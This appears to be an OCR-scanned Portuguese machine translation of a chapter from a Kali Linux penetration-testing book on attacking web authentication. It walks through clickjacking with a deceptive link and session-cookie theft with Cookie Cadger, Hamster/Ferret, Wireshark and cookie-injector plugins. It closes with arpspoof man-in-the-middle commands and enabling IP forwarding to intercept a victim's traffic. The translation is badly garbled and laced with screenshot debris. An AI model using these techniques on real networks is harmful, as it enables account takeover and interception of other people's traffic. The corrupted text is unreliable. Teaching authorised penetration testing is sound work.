classifica a autenticação baseada em três tipos de fator, como segue: 


e Algo que você sabe, como um PIN ou palavra-passe 
e Algo que você tem, como um cartão inteligente 


e Algo que você é, como uma impressão digital 


O método mais comum pelo qual as pessoas confirmar a sua identidade está usando algo 

eles sabem, como uma senha. Nós cobrimos várias maneiras para quebrar senhas em 
Capítulo 4, Ataques lado do cliente, ao atacar sistemas host. Rachando uma senha 

vai te dar acesso a alguns sistemas no entanto, muitos alvos irá alavancar multifatorial 
autenticação, ou seja, uma combinação de passos de autenticação para provar sua identidade. 


É comum que a autenticação do usuário envolve o uso de um nome de usuário e senha 
combinação. Torna-se complicado para um usuário para inserir essas informações a cada 

tempo de autenticação é necessária. Para superar isso, single sign-on foi criado como um 
significa para autenticar uma a uma autoridade central que tem a confiança de outros sites. 

A autoridade central irá verificar a confiança em nome do usuário ou dispositivo, de modo que o 
usuário pode 

acesso múltiplo sistemas protegidos, sem ter que ser solicitado em cada segurança 

gateway. A autoridade comum de confiança é um controlador de domínio do Windows, fornecendo 
autenticação para usuários internos para recursos da intranet. Em tais casos, comprometendo 
uma autoridade confiável ou uma conta com privilégios elevados pode significar o acesso a muitos 
outros 

recursos internos deste tipo de sistema. 


Atacando Autenticação 


Muitos órgãos do governo alavancar um Verificação de Identidade Pessoal (PIV) ou 

Cartão de Acesso Comum (CAC), juntamente com uma senha, para atender os usuários têm algo 
e saber. É comum que os trabalhadores remotos para usar um token digital que produz 

um número fresco a cada poucos segundos, juntamente com um PIN para representar algo que 
ter e saber. Locais físicos de alta segurança pode exigir a digitalização de impressões digitais 
junto com PIN para acesso. Tecnologia de controle de acesso de rede pode verificar como a 
usuário é autenticado em um computador portátil, bem como procurar um certificado escondido para 
verificar , 

a identidade do sistema e do usuário antes de fornecer recursos de rede. E crítico 

identificar o método de autenticação usado pelo seu alvo durante o reconhecimento 

fase de um teste de penetração, assim você pode planejar uma estratégia para contornar essa 
confiança. 


O foco deste capítulo é em torno de como os usuários e dispositivos de autenticação para web 
aplicações com o objetivo de comprometer essa confiança. Vamos começar atacando o 

processo de gerenciamento de sessões de autenticação, que é como a confiança é estabelecida entre 
o cliente e o servidor. Em seguida, vamos nos concentrar nos clientes, atacando como os dados são 
armazenados 

em sistemas host através de uma gestão cookie. A partir daí, vamos olhar para esconder em 

entre o cliente eo servidor utilizando técnicas de ataque man-in-the-middle. A última 

tópicos serão identificar e explorar a fraqueza na forma como aplicações web aceitar 

dados de autenticação através de SQL e cross-site scripting (XSS). 
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Atacar o gerenciamento de sessões 


Autenticação e gerenciamento de sessão compõem todos os aspectos da manipulação de usuário 
autenticação e gerenciamento de sessões ativas. Com relação às aplicações web, 

uma sessão é o período de tempo que os usuários gastam em um site. A melhor prática é a gestão 
sessões autorizadas (isto é, o que você tem permissão para acessar), com base em como as 
pessoas 

e dispositivos de autenticação, bem como, controlar o que e quanto tempo os recursos 

estão disponíveis durante a sessão ativa. Isso faz com que a autenticação um aspecto fundamental 
da 

gerenciamento de sessões autorizadas. 

O objetivo de um verificador da penetração é identificar contas que são permitidos o acesso a 
sessões com privilégios de alto nível, e tempo ilimitado para acessar o aplicativo web. 

É por isso que os recursos de segurança de gerenciamento de sessão, como intervalos de tempo 
limite da sessão 

e certificados SSL, foram criados. De qualquer forma, as ferramentas disponíveis em Kali pode 
identificar 

falhas na forma como as sessões são gerenciados, como a captura de uma sessão ativa em uma web 
Sair pós aplicação de usuário e usar a sessão para outra pessoa (também conhecido 

como um ataque de fixação de sessão). 

Ataques de gerenciamento de sessão pode ocorrer usando vulnerabilidades em aplicações ou como 
usuários acessar e autenticar para essas aplicações. Formas comuns atacantes fazer isso 

é através de cross-site scripting ou ataques de injeção de SQL para um servidor web, o que será 
coberto mais tarde neste capítulo. Os invasores também podem tirar proveito de cookies de sessão 
em 

navegadores da web ou vulnerabilidades em páginas web para alcançar resultados semelhantes. 
Vamos começar 

olhando para uma técnica usada para enganar os usuários para que divulguem informações 
sensíveis, ou 

expondo-se a ataques através de hiperlinks e iFrames modificadas. 


Clickjacking 


Clickjacking é uma técnica onde um atacante engana um usuário a clicar em algo 

além do que eles acreditam que estão clicando. Clickjacking pode ser usado para revelar 
informações confidenciais, como as credenciais de login, bem como permitir uma 

invasor assuma o controle do computador da vítima. Clickjacking geralmente expõe um 
problema de segurança navegador ou vulnerabilidade usando o código incorporado ou script que 
executado sem o conhecimento da vítima. Um exemplo de realização é de clickjacking 

tendo o texto do hiperlink para um site confiável diferente do que o próprio site. A média 

usuário não verificar antes de clicar em hiperlinks, ou avisos mudanças associadas com 
tentativas clickjacking comuns, tornando esta uma forma muito eficaz de ataque. 


No exemplo a seguir, o usuário verá Visite-nos no Facebook.com No entanto, quando 
clicar no texto, eles vão realmente ser redirecionado para www.badfacebook.com. 


<a href="http://www.badfacebook.com"> Visite-nos em Facebook.com </ a> 


[177] 


Atacando Autenticação 


Clickjacking pode ser mais malicioso e complicado do que mudar hiperlinks. 

Os atacantes que usam clickjacking iFrames normalmente incorporar em uma página web. O conteúdo 
dos iFrames contém dados do site de destino e, geralmente, colocado sobre um 

ligação legítimo o que torna difícil de detectar. 


Para criar o seu próprio ataque de clickjacking, você pode usar a ferramenta por clickjacking Paul 
Stone, 

que pode ser baixado em: http://www.contextis.com/research/tools/ 

clickjacking-ferramenta /. 


p] context SERVICES ABOUT US Ss OASIS CONTACT US 
Nag y D 


RESEARCH SERVICES 
RECENT BLOG POSTS 


CLICKJACKING TOOL 


Depois de ter baixado a ferramenta, você pode usá-lo para ter o código de outro 

site, como um botão de voto ou como um botão. A ferramenta funciona com clickjacking 

Firefox 3.6. A ferramenta por Paul Stone não irá funcionar com versões mais recentes do Firefox; 
no entanto, você pode executar várias versões do Firefox no arsenal incluindo Kali 

Firefox 3.6 ou mais. 


Website código muitas vezes muda, por isso certifique-se de ajustar os seus ataques 
para 
acomodar atualizações que espelham o site confiável. 


Cookies de sessão Sequestro web 


Cookies são um pequeno pedaço de dados enviados de um site e armazenado em uma teia de 
usuário 

navegador enquanto o usuário está acessando o site. O site pode usar um cookie para 

verificar o retorno do usuário para o site e obter informações sobre o usuário do anterior 
atividade. Isso pode incluir as páginas que foram acessadas, como logado, eo que 

botões foram pressionados. Toda vez que você entrar em um site, como o Facebook, Gmail, ou 
Wordpress, o seu browser atribui-lhe um biscoito. 
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Os cookies podem incluir a história de rastreamento dos usuários por longos períodos de tempo, 
incluindo 

comportamento em um site de anos atrás. Os cookies também podem armazenar senhas e valores 
do formulário 

um usuário tenha previamente preenchido, tal como seu endereço ou número de cartão de crédito. 
Este 

é útil para as empresas, tais como varejo olhando para proporcionar uma experiência simplificada 
para os consumidores. Um token de sessão é entregue a partir de um servidor web a qualquer hora 
uma série 

autentica. O sinal de sessão é usada como uma forma de reconhecer entre diferentes 

ligações. Sequestro de sessão ocorre quando um atacante captura um token de sessão e 

injeta-lo em Ee próprio navegador para ter acesso a sessão autenticada da vítima. 


Fest pA aine malig amas RSs RAD SEE UO SAULO UL LL PERE oM atacante com uma vítima 


e Roubar cookies é inútil se o alvo esta usando https:// para a navegação, e 
criptografia end-to-end está habilitado. A adoção tem sido lenta, no entanto, a maioria 
sites seguros fornecer essa defesa contra ataques de sequestro de sessão. 


Você pode usar sslstrip como um método para impedir que o seu alvo de estabelecer 
a x _ uma https conectar antes de lançar um sequestro de sessão ou outro ataque. Ver 
Capítulo 3, os ataques do lado do servidor, para mais informações sobre sslstrip. 


e A maioria dos cookies expiram quando o alvo fizer fora de uma sessão. Este também 
registra 
o atacante fora da sessão. Este é um problema para alguns aplicativos móveis que 
biscoitos de alavancagem que não expiram, ou seja, um atacante pode obter acesso 
para a vida, se um token de sessão válido é capturado. 


Muitos Web site não suportam logins paralelas, que nega o uso de um 
bolinho roubado. 


Sessão de Ferramentas 


Weba seção irá cobrir as ferramentas utilizadas para sessões web de teste de 
penetração. 

Algumas ferramentas não estão disponíveis em Kali1.0, no entanto, elas podem ser obtidas 
em linha. 
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Plugins do Firefox 


O método manual para realizar um sequestro sessão está roubando a autenticação da vítima 
cookie. Uma maneira de conseguir isso é a injeção de um script em um web comprometido 
servidor de aplicativos tão cookies são capturados sem o conhecimento da vítima. A partir de 

lá, o atacante pode colher os cookies de autenticação e usar uma ferramenta de cookie injetor 
para substituir o cookie do atacante com um cookie roubado autorizado. Outros métodos utilizados 
para roubar cookies são packet sniffing, o tráfego de rede e comprometer hosts. Roubo 

cookies serão abordados mais adiante neste livro. 


O navegador Firefox oferece muitos encaixes que podem ser utilizados para injectar biscoitos 
roubados 

no navegador de um atacante. Alguns exemplos são GreaseMonkey, Cookie Manager e 
Firesheep. Sugerimos navegar na marketplace de plugins do Firefox para vários biscoitos 
ofertas de gerenciamento para atender às suas exigências de penetração. 


ig 4 Firefox e todos os plugins associados nao sao instalados por padrao 
XR > Kali em Linux 1.0. 


Firesheep - Plugin do Firefox 


Firesheep é uma ferramenta clássica Teste de Invasão usado para auditar sessões web. Firesheep 
é uma extensão para o navegador Firefox, no entanto, algumas versões têm sido 

instável com recentes lançamentos do Firefox. Firesheep atua como um farejador de pacotes que 
intercepta 

os cookies não criptografados de sites, enquanto que transmitem através de uma rede. 


MAC, tornando-se incómoda para operar em Linux. Trabalho feito sob encomenda podg ser 
usado para fazer Firesheep operacional num ambiente Linux, no entanto, 


Plugin do Firesheep para o Firefox é oficialmente suportado no Windows e 
Sg 
, Recomenda-se a utilização de uma ferramenta mais actual. 


Web Developer - Plugin do Firefox 


Web Developer é uma extensão para Firefox que adiciona ferramentas de edição e depuração para 
desenvolvedores web. Web Developer pode ser baixado gratuitamente a partir do plugin do Firefox 
loja. Uma característica em Web Developer útil para seqüestro de sessão é a capacidade de editar 
cookies. Isto pode ser encontrado como uma opção de drop-down a partir do navegador Firefox uma 
vez 

Web Developer é instalado, como mostrado na imagem seguinte: 
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Disable Cookies 


Add Cookie. CK.Cq 


Delete Daman Cookies 
Delete Path Cookies 


Delete Session Cookies 


98 JOWN View Cookie Informatian HELP (a) 


Selecionar Ver Informações Cookie, e você vai ver os cookies armazenados. Você pode clicar 
em Editar Cookies para abrir o editor de cookie e substituir o cookie atual com um 
biscoito roubado da vítima. 


Edit Cookie 
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Greasemonkey é um plugin do Firefox que permite aos usuários instalar scripts que fazem no 
voar alterações no conteúdo da página web antes ou depois que a página é carregada. 
Greasemonkey 

pode ser usado para personalizar uma aparência página web, as funções da web, a depuração, 
combinando dados a partir de outras páginas, bem como outros fins. Greasemonkey é 
necessário para fazer outras ferramentas, tais como cookies Injector, funcionar corretamente. 


Biscoito Injector - Plugin do Firefox 


Biscoito Injector é um script de usuário que simplifica o processo de manipulação de navegador 
cookies. Há uma série de etapas manuais para importar um cookie de uma ferramenta como o 
Wireshark 

em um navegador web. Biscoito Injector permite ao usuário copiar e colar uma parte do bolinho de 
um lixão, e ter os cookies do despejo criado automaticamente no momento 

visto página web. 


[ Sd Você deve ter Greasemonkey instalado para utilizar o script Injector Cookie. 


Para instalar cookies Injector, pesquisa no Google para Biscoito Injector para abrir um download 
ligação para o script. Quando você selecionar o download de Cookies Injector, Greasemonkey ira 
pop-up, o que levou a sua aprovação para a instalação. 


Cookie injector installed successfully ge 


Ok 


Depois de instalar o script de Cookies Injector, pressione Alt + C para exibir o diálogo cookie. 

Cole uma string Wireshark copiado na caixa de entrada e clique em Ok para injetar os cookies 

na página atual. Veja o Wireshark seção sobre como copiar os cookies for Cookie 

Injector utilizando Copy, Bytes, e selecione Somente Texto para impressão no Wireshark. O próximo 
duas imagens mostram prementes Alt + C, colando um Dump Wireshark Cookie, e 

clique Ok para ver o pop-up que os cookies capturados foram escritos no 

Navegador da Internet. 


Y 


Wireshark Cookie Dump 


50289 Connection E q 


OK Cancel 
w 
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All Cookies Have Been Written 


Os cookies Gestor + - Plugin do Firefox 


Os cookies Gestor + é um utilitário usado para visualizar, editar e criar novos cookies. Biscoito 
Gerente + mostra informações detalhadas sobre cookies, bem como pode editar múltipla 
biscoitos de uma vez. Cookie Manager + também pode fazer backup e restaurar os cookies. Você 
pode 

baixar Cookie Manager + a partir da loja plugin do Firefox. 


Uma vez instalado, Cookie Manager + pode ser acessado em Ferramentas, seleccionando 
Os cookies Gestor +. 


Downloads Crri+Snittey B | 
Add-ons Ctrl+ShitthaA 


Set Up Syrx 


Gressemonkey 
Web Developer 

Web Developer Extension 
Page Irfo Ctri+! 


ADD-ONS Cookes Managert 


EXTENSIONS THEMES COLLECTIONS “ras 


Os cookies Gestor + irá mostrar-lhe todos os cookies capturados pelo Firefox. Você pode rolar 
para baixo ou procurar Cookie (s) específico para visualizar e / ou editar. No meu exemplo, eu 
estou 

a procura de qualquer cookie associado www.thesecurityblogger.com. 


Cookies Managert v1.5 11 [showing 7 of 231, 
Fila Edit View Tools Help 
Sex ch meset uritydlogger| Refresn 


Site 


mue tr nem nee nn 


wp-settings-1L 
editor$IDtirymee $26m0%3 DrX 26m11%3 Dok 26n 


www .thesecurityblagger.cam 
ij 
Any type af connection 


Sat 10 May 2014 09:01:40 PM EDT Wi expo» 


Delete 
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Os cookies Gestor + torna fácil editar os cookies existentes. Isto pode ser útil para 
realização de vários tipos de ataques, como sequestro de sessão e injeção de SQL. 


Name wp-sattngs-1 


Content editor %3 Dtrymce¥26m0% 3Oc%26m114 300% 26m641 Do% 26mgsrze 


Host www. thesecurnityblogger.com 
Path 
Send For Ary type of connection 


Http Only: 


Expires May 10, 2014 | 21:01:40 


201 21 01 


Biscoito Cadger 


Biscoito Cadger é uma ferramenta de teste de penetração usado para auditar sessões web. Biscoito 
Cadger pode incluir solicitação HTTP detalhada captura e reprodução de HTTP inseguro 
Requisições GET, como itens solicitados, agentes de utilizador, referrer e autorização básico. 
Biscoito Cadger pode fornecer uma análise ao vivo para Wi-Fi e redes com fio, bem como 

carga de captura de pacotes arquivos (PCAP). Biscoito Cadger também inclui detecção de sessão 
para 

determinar se o usuário está conectado em páginas web como Wordpress e Facebook. Biscoito 
Cadger é considerado por alguns como Firesheep em esteróides. 


O Biscoito Cadger não vem com Kali 1.0. 


Biscoito Cadger pode ser baixado a partir de www.cookiecadger.com. O download 

será um arquivo JAR. Dê um duplo clique no arquivo para abri Biscoito Cadger. Um aviso será 
pop-up perguntando se você deseja ativar a detecção de sessão. Clique em Sim, eo principal 
painel irá aparecer. As próximas duas imagens mostram o Cookie Cadger 1.0 

Arquivo JAR com a mensagem de aviso introdução pop-up e cookies principal 

Cadger painel. 
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Cookie Cadger-1 0 


ar 


Enable Session Detection? 


Session detection replays web requests in the background and analyzes 
them for evidence that a user is logged in. Enabling session detection 
will cause Cookie Cadger to utilize a larger amount of available 

system resources. 


By enabling this feature you also understand that: 


1) Cookie Cadger will (potentially) automatically impersonate any 
network user without their explicit permission or interaction on your part, 


2) The legality of doing so varies between jurisdictions. It is your 
responsibility to understand and comply with any applicable laws. 


Would you like to enable session detection? 


Cookie Cacger 
Fe Edit Melp 
eth ino descriptions Start Capture of eth 


Requests | Recegnized Seusterns 


1 sarj Domein Contas RAapiey Roques Mosty & Nepiey Toques 


Ewy VP PU See meros n pru w 
a M 

Capture device search completed with 4 devices fousd 
Cookie Cadger 441.00, Nitpe/\cookiocadger com) 


Croatod by Matthew Sullivan - matt cHtobytos. com 
Ths software às freely distriheted under the terms of the FreeBSD license 


Para começar, selecione a interface apropriada, e clique em Iniciar captura. Biscoito Cadger 
oferece a possibilidade de tomar em múltiplas interfaces, se disponível. 
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Biscoito Cadger pode enumerar todos os dispositivos encontrados na rede disponível. 
Por exemplo, a imagem seguinte mostra um i686 Linux usando o Firefox e Iceweasel. 


Requests | Recognized Sessions 


Filter MACs Filter Durmnæins Filter Renu=sis 


00:00: 29:49:84; 73 [all Domains ] = 


a.scorecardresearch.com 
MAC Address: 00:0¢:29:49:84;73 
IPv4 Address: 172.16.76,131 
Detected User-Agents: 
- Mogilla/5.0 (X11: Unux i696; 18.0) Gecka/20100101 Firefox/18.0 Iceweasel/18,D.1 


Atividades recentes encontrado por Cookie Cadger é exibido no texto azul para cada campo. 
Você pode visualizar detalhes sobre o local onde o anfitrião é o surf, nomes como netbios e 
nomes de host. Você pode copiar os pedidos para a caixa de clipe e exportação de informações, 
tais como 

informações do usuário, e endereços MAC. Guias de filtro estão disponíveis para cada seção para 
zero em alvos específicos (por exemplo, apenas olhando para os domínios do Facebook). 


Sempre Biscoito Cadger reconhece uma sessão de login, ele captura-lo e dá a capacidade 
para carregar a sessão. À imagem seguinte mostra uma captura de sessão do administrador 
registrando em www thesecurityblogger.com. Biscoito Cadger mostrará um icone e 

explicar o tipo de sessão capturado. Este poderia ser um Hotmail, Facebook, ou neste 
exemplo, Wordpress de login. 


Cookie Cadger 
Fae Edt Help 


otho [no description] (CURRENTLY CAPTURING) Stop Capture on ethd 


Requests Recognized Sessions 


Wordpress installation on 
www.thesecurityblogger.com 


User "= 


Automatically Load Sessions inte Browser (Domo Mode} Load Selected Session 


A 


sL 


Capture device search completed with 4 devices found 


Cookie Cadger (41.00, https: cookiecadger.com) 
Created by Matthew Sullivan - mattslifebytes.com 
This software is freely distributed under the terms of the Free®S0 license, 


Opening etho for traffic capture 
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Para ver as sessões reconhecidos, clique na aba Sessões reconhecidos 

e pegar uma sessão a partir da janela, como mostrado na imagem anterior. Uma vez 
realçado, clique no Carregar Sessão Selecionado botão para repetir a sessão. Biscoito 
Cadger irá exibir Carregando na janela inferior, e um navegador abrirá logged 

como o usuário durante a sessão capturado. A figura a seguir mostra abertura 

um cookie de domínio capturado da vítima. Uma vez que a carga está completa, o padrão 
Navegador de Internet irá abrir a página capturada com os direitos associados ao 

bolinho roubado. 


WWW. My Space.com bi lo:54 AM: /wp-Comlent, Jins 

www. UhesecurityMogger.co 6:16:54 AM: up-cemt ent, plugine/i- fash- aaa sm ss The? pes js?ve 

www. yahoo.com 6:16:54 AM: /wp-comtent,plugias1-Tlash-gallery/js/qgallery/phet cba 
6:16:54 AM: wp-comtent/plugias/daily-stat/|s/Lluc ajax quolp js?ve 
18:18:54 Mis werent ent /plugins/daily-stat}s/Luc ajax tables. js?y — 
‘ | >| 


b Loed Domain Cookies Replay Lequest | Modify & Replay Request 


Loading request int: lease wait.. 


Para ver as informações de solicitação de sessão, clique com o botão direito no icone da sessão 


capturado 
e selecione Ver Associado Request. Isso o levará de volta para a Pedidos aba 
e mostrar que sessão. 


Wireshark 


Wireshark é um dos o protocolo de rede mais popular fonte, livre e aberto 

analisadores. Wireshark é pré-instalado em Kali e ideal para solução de problemas de rede, 

análise, e para este capítulo, uma ferramenta perfeita para monitorar o tráfego de potenciais alvos 
com o objetivo de capturar os tokens de sessão. Wireshark usa um widget toolkit GTK + para 
implementar a sua interface de usuário e pcap para capturar pacotes. Ele opera de forma muito 
semelhante ao 

umatcpdump comando, no entanto, atuando como uma interface gráfica com a classificação integrado 
e opções de filtragem. 
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Wireshark pode ser encontrado em Sniffing / Spoofing |Sniffers de rede, e selecionando 
Wireshark bem como sob a Top 10 Ferramentas de segurança categoria. 


Fie Edt View Go Capture Aradyze Statistks Telephony Tools Internals Help 


Fiter Esprascion 


Interface List Open a Website 


— 
& Lee Lint of the capt ae reler poem Opera prevounly captured Me Vor the project’) wetete 


ieun x ore ing pactetts 


Span Recem so User's Guide 
7’ 


Tie Lee's Cuk Corta vnm ori 


Es Start 
Choos ane o morentertaces to capturef rom, then Start w Sample Captures 


A rkhassertmere of eaw pie capter enka onthewes g Security 


E eto 
7 Weak WE WW STWR os Leu 


EF Linux netfiter log INFLOG) interface! rfleg 


BP) Posuda- darie that captures on all rtorfaces ane 


Capture Options 


Start a capture tt detaged captors 


ee 


Para começar a capturar o tráfego, selecione o Captura e separador Interfaces. Você vai ver o 
interfaces disponíveis para captura. No meu exemplo, eu estou indo para selecionar ethO clicando 
em 

na caixa de seleção ao lado de eth0 e selecionando Iniciar. 


Você não pode ver o tráfego se a interface de rede em que você está 

captura não suporta o modo promíscuo, ou porque o 

OS não pode colocar a interface em modo promíscuo. Mais informações sobre 
diferentes modos de captura e solução de problemas pode ser encontrada em 
www.wireshark.org. 


Wireshark: Capture Interfaces 


Device Description IP Packets Packets/s 
ml ethO 172.16.76.131 
* nflog Linux netfilter log (NFLOG) interface 
J any Pseudo-device that captures on all interfaces 
127.0.0.1 


Stop | | Options Close 
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Wireshark irá capturar todo o tráfego visto no fio. O tráfego pode ser filtrado, digitando 
itens específicos no espaço de filtração ou por ajustamento da organização de dados através do 
topo 
tabelas, como protocolo ou destinos. 
Capturing from atho shark 1.8.5 
File Edt View Go Capture Analyze Statetes Telephony Toole internas Help 


aoe = °F: EB sscnaos -~ 


Filter: | | Expression 


No Tme Source Destination Protocol. Length Info p 
260 175.0016220 9), 13, 77.90 172.16.76,131 TEP E0 httpo - S06 [AK] Sequlas ackezlá Wi 
ZBL 175.065520% 31, 13, 77.99 172.16.76.131 TLSvL 91 &oplication Data 


263 175.0590349 3). 13., 77.90 172.16.76.131 81 Encrypted Alart 


ZES 180, 1130349009, 171,235.16 172, 10.76, 131 964 épplication Data 

286 190, 1130550K 172. 16.75.131 65. 171.233,16 54 38133 > https [AK] Seg=E113 &k=3051 | 

BRT 190. 11672200 173, 18.78. 131 EE. 171.758. 15 1106 taplication Data 

286 190. 11991600 49. 171.235. 16 172. 16.76. 131 SO https » 38123 [AKK] Seq-385] Ack=9025 | 

260 190. 35777XKK 172. 16.76.1351 69.171.242.17 91 4oplication Data 

250 190. 3810090K 69, 171,242.27 172.16.76,131 GJ https > 51024 [AK] seq=2905 tck=5083 |) 
251 190. VOLI GS, 171,242.27 172.16.76,131 91 Moplicaticon Data 

292 103.3501230% 172.16.78.131 -171.242. 34 SLO24 = https [AX] Seq=p073 Ackezaz Il 


Åe 2) 
b Prerm i: 54 bytes on vire |432 bital, 54 bytwa captured (432 bita) on interface O 

b Ethernet IL, Src: Wewara 40:84:73 [D0:00:70:40084:73], Det: Wrware_eai8S:48 (00:50:Sé:ea:85: 46] 

b Internat Protocol version 4, Sre: 172.18.76.131 (172.16.76.1311, Det: 190.7.48.72 [199.7.46.72] 

b 


29 49 E4 73 06 DO 45 00 .PV..H.. 11.5..E. 
OJ es ac 10 4c BS cr a Ae é us UM bares 
OH Ps: 


e bico ds 74 83 la 51l tretenP, 


Wireshark captura um monte de detalhes, por isso é importante para filtrar por coisas específicas, 
como parâmetros para os cookies não garantidos como http.cookie. Por exemplo, o Gmail por 
padrão é criptografada, no entanto, você pode desativar o https e procurar o GX parâmetro 
contido numa http.cookie para identificar os cookies do Gmail não garantidos. A sequência 
imagem mostra captura o cookie de login em um blog Wordpress: 


J © | Expression... Clea Swe 


Source Destination 


b Frame 2127: 706 bytes on wire (GIZE bits], 706 bytes captured (6129 bits] on interface O 

b Ethernet II, Src: Weesre_49:94:73 [0770 Dem me Ta), Ost: Ware eszES;9E [pm om 7 ©) 

> Internet Protocol Version 4, Srez 1218.38.13 fe AAD. Sehr SACO 80.00 LEA DE MO 8) 

D Transmission Control Protocol, Sre Port; 37737 (57737), Ost Port: http [80], Seq; 1, Ack: 1, Len: 712 
p 
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Uma vez que você capturar um cookie sem garantia, você deve usar uma outra ferramenta para 
injetá-lo em 

seu navegador para completar o sequestro de sessão. Escolha o cookie vítimas, com o botão direito 
clique na linha, e selecione Cópia |Bytes |Texto para impressão somente. Agora, você pode colar 
isso em um Injector Cookie, como o Firefox plugin do Biscoito Injector. Veja Cookies 

Injector para completar o ataque sequestro de sessão em plugins do Firefox. 


Você deve ter o Greasemonkey e Cookies Injector para copiar / colar 


a x 
[ a> no navegador Firefox. 


Existem muitas ferramentas Uteis disponiveis que suportam captura Wireshark e simplificar 
foram encontrados dados. Um exemplo é o NetWitness Investigator que pode ser baixado 
gratuitamente 

a partir de www.emc.com. 


Hamster e Ferret 


Hamster é um utilitário usado para roubar cookies com sequestro de sessão HTTP com passivo 
sniffing também conhecido como Sidejacking. Hamster escuta em uma rede, captura qualquer 
cookies de sessão visto, e as importações roubado biscoitos em um ambiente GUI navegador para 
o atacante pode repetir a sessão. Hamster usa Ferret para pegar cookies de sessão. 


Hamster pode ser acessado por navegar para Sniffing / Spoofing |WebSniffers e 
selecionando Hamster. 


Quando você inicia Hamster, um Terminal abrirá o início do serviço de Hamster. O 
IP proxy padrão será 127.0.0.1:1234. 


Terminal 


View Search Termina Help 


2.0 side-jacking 


wser tō use proxy http: 


set ports . 
Listening port(1234) 
127 J di L234 


Você pode acessar Hamster abrindo um navegador e navegar para 
http://127.0.0.1:1234. 
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Mozila Firefox Stet Poor 


-- no 
clone 


STEPS:In order to siciqjack web sessions, follow thase steps. FIRST, click on the adapter manu and 


targe start sniffing. SECOND, y a few seconds an ke sure pa re being racsived. THIRD, wait 


intil tar | FIFTH. purge the cookies 

oo from your b ce - 5. agalr 

TIPS: remember to refresh this page ses updates, and make sure to purge all cookies 
4 ah from the browse 

gabi WHEN SWITCHING target, rember close all win your browser and purge all cookies first 

sslectad Status 

yet Proxy unknown 

Adapters: nons 

Packets: 0 

Database: 0 


Targets: 0 


O tráfego deve viajar através do hamster para que ele faça o seu trabalho. Você pode selecionar qual 
adaptador 


usar clicando no link adaptadores. Para o meu exemplo, eu estou indo para farejar ethO. 
ming, type in the adapter name 
ode monttoring. You may have t 


f adapters 


Sb er 


Hamster esta redireccionado para uma pagina de atividade Sidejacking. Vocé vai notar que nao sao 
receber quaisquer pacotes. Hamster precisa de um sniffer para pegar transito. Vocé pode usar Ferret 
acessando Sniffing / Spoofing |Sniffers Web e selecionando Ferret. ATerminal 

janela pop-up com algumas opções. Digite furão-i INTERFACE para selecionar 

a interface para farejar com Ferret. Ferret irá dizer-lhe que está cheirando eo comando 

aviso irá pendurar em um estado de execução. Como você pode ver o tráfego, a captura de tráfego 
será exibida 

como texto em Ferret. 
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Uma vez Ferret está em execução, navegar de volta para Hamster, e você deve começar a 
veja pacotes. Todas as metas da rede aparecerá. Clique em um alvo para ver 
biscoitos capturadas. 


a 


172.16.76.131 HAMSTER 2.0 SideJecking 
[ adapters | help J 


STEPS:ln order to sidejack web passions, follow theee steps. 
FIRST, click on the adapter menu and start sniffing. SECOND 
wait a faw seconds and make cure packets are being received. 
THIRD, wait until targote appear. FOURTH, click on that target 
to “clone” it's session. FIFTH, purge the cockisa from your 
broweer just to make sure none of them conflict with the cloned 
targets. again 
TIPS: remember to refresh this pags cccascinally to ses 
data% 2" updates, and make sure to purge all cookies from the browser 
bttp WHEN SWITCHING target rember to chae all windows in your 
#13013 broweer and purge all cookies first 
davaya Status 
Unipar Proxy: unknown 
Ayp-adn Adapters: nons 
btta Packets: à 
15013 Database: 315 
d=wavye Targets: | 
© bth stave 
Ayp-adn o 172.18.79.131 
Y=. 


Clique em qualquer cookie para acessar a sessao de captura. No meu exemplo, eu repetir 
acessando 
www.thesecurityblogger.com. 


= 127.0.0.1 
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Man-in-the-middle ataque 


Um ataque man-in-the-middle é uma forma de escuta ativa em que o atacante 

faz uma conexão com as vítimas e retransmite mensagens entre as vítimas, tornando-os 
acredito que eles estão falando diretamente para o outro. Há muitas formas de este ataque, 
como o uso de um roteador sem fio Hak5 abacaxi que pretende ser uma rede sem fio confiável 
ponto de acesso, enquanto realmente agindo como um man-in-the-middle entre vítima e 

rede sem fio. Outro exemplo é usar Kali para encaminhar o tráfego entre uma vítima 

eo roteador padrão, enquanto sniffing para informações úteis, tais como credenciais de login. 


via HTTPS, o que impede um ataque genérico man-in-the-middle. Para ignorar 
HTTP seguro, você pode usar ssistrip, que irá revelar todas as informações de login 
ao seu ataque man-in-the-middle. O sslstrip / man-in-the-middle 

combinação é um método muito eficaz para roubar credenciais de login da vítima, se 


Muitos serviços em nuvem como o Facebook eo Gmail alavancagem login seguro 
ig a 4 
você tem um sistema de ataque na mesma rede que o sistema (s) alvo. 


dsniff e arpspoof 


dsniff é um conjunto de senha sniffing e ferramentas de análise de tráfego de rede projetados 
para 

analisar diferentes protocolos de aplicação e extrair informações relevantes. 

arpspoof é usada quando um atacante envia falso Address Resolution Protocol (ARP) 
mensagens em uma rede de área local. O objetivo deste processo é associar o 

endereço MAC do atacante com o endereço IP de outro host, fazendo com que todo o tráfego 
voltados para o endereço de IP para ser enviado para o atacante vez. 


Um método manual para realizar uma man-in-the-middle está usando arpspoof e dsniff 

a sentar-se entre os sistemas. O primeiro passo é identificar o endereço IP da sua vítima 

eo gateway padrão da rede, utilizando técnicas de Capítulo 2, Reconnaissance 

- Conceitos Básicos, Depois de saber os endereços de IP, você precisa dizer a sua vítima você 
são realmente um outro sistema ou o gateway padrão. Por exemplo, se uma é vítima 
172.16.76.128, o gateway padrão é 172.16.76.2 eo invasor é 172.16.76.131, 

você deve definir o seu endereço IP 131 para se parecer com a vítima e gateway padrão usando 
o comando arpspoof. 


Abrir dois Terminal janelas e digite os seguintes comandos em cada janela para 
falsificar suas vítimas: 
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TERMINAL 1: 


arpspoof-t 172.16.76.128 172.16.76.2 // diz vítima 2 você é o 
gateway padrão 


TERMINAL 2: 


arpspoof-t 172.16.76.2 172.16.76.128 // diz vítima 1 você é o 
gateway padrão 


roct@katr = 


d Half 


weovqwocvwd 


Se você digitar os comandos corretamente, você deve ver que o tráfego está sendo reproduzido 
através do sistema de ataque. Tráfego não está indo para e da vítima, de modo a 

vítima não iria ver o tráfego que vai para fora da rede neste momento. Para completar o 

ataque, você precisa habilitar IP para frente para que o tráfego continuará a fluir a partir do padrão 
porta de entrada para a vítima e vice-versa, enquanto o atacante está observando o tráfego entre 
a vítima eo gateway padrão. 


Abra um terço Terminal janela e digite: 


echo 1> / proc/sys/net/ipv4/ip. forward 


# echo 1 > /proc/sys/net/ipv4/ip forward 


Neste ponto, o tráfego deve fluir entre a vítima eo gateway padrão, enquanto 
indo através do sistema invasor. A figura a seguir mostra o de ping falhar 
